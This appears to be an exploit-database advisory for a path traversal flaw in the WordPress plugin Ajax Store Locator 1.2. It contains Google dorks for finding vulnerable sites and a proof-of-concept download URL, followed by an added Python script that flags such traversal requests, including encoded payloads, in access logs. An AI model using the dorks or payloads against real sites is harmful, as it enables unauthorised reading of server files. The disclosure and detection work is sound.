WordPress Plugin Ajax Store Locator 1.2 - Arbitrary File Download

Author: Claudio Viviani
type: webapps
platform: php
date_added: 2014-12-10  
date_updated: 2014-12-10  
verified: 0  
codes: OSVDB-115595  

raw file: 35493.txt  
######################

# Exploit Title : WordPress Ajax Store Locator <= 1.2 Arbitrary File Download

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356

# Software Link : Premium

# Dork Google: inurl:ajax-store-locator
#              index of ajax-store-locator

# Date : 2014-12-06

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# PoC Exploit:

http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile]

The "download_file" parameter is not sanitized, so path traversal sequences in it reach the file download.
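
A log check for requests matching the PoC above, added here as an example (not part of the original advisory or the plugin's code). It assumes a combined-format web server access log; the sample lines, the IP addresses and the benign file name stores.csv are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter named in the advisory.
ENDPOINT = "sl_file_download.php"
PARAM = "download_file"

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so nested encodings are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(value):
    """True if the value points outside the directory it is resolved in."""
    path = fully_decode(value).replace("\\", "/")
    absolute = path.startswith("/") or bool(re.match(r"^[A-Za-z]:", path))
    return absolute or ".." in path.split("/")

def find_traversal(lines):
    """Return (line_number, decoded_value) for each flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # The plugin directory name varies per install, so match the script name.
        if not url.path.endswith("/" + ENDPOINT):
            continue
        for value in parse_qs(url.query).get(PARAM, []):
            if is_suspicious(value):
                hits.append((number, fully_decode(value)))
    return hits

# Constructed sample log lines (not taken from a real server).
PLUGIN = "/wp-content/plugins/ajax-store-locator-wordpress_0/" + ENDPOINT
SAMPLE_LOG = [
    f'203.0.113.5 - - [10/Dec/2014:10:00:01 +0000] "GET {PLUGIN}?download_file=stores.csv HTTP/1.1" 200 512',
    f'203.0.113.9 - - [10/Dec/2014:10:00:07 +0000] "GET {PLUGIN}?download_file=../../somefile HTTP/1.1" 200 2048',
    f'203.0.113.9 - - [10/Dec/2014:10:00:09 +0000] "GET {PLUGIN}?download_file=%252e%252e%252f%252e%252e%252fsomefile HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Dec/2014:10:00:12 +0000] "GET /index.php?download_file=../x HTTP/1.1" 404 0',
]
```

A 200 response on a flagged line means the file was served and its contents should be treated as disclosed.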


#####################

Discovered By : Claudio Viviani
                http://www.homelab.it

                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################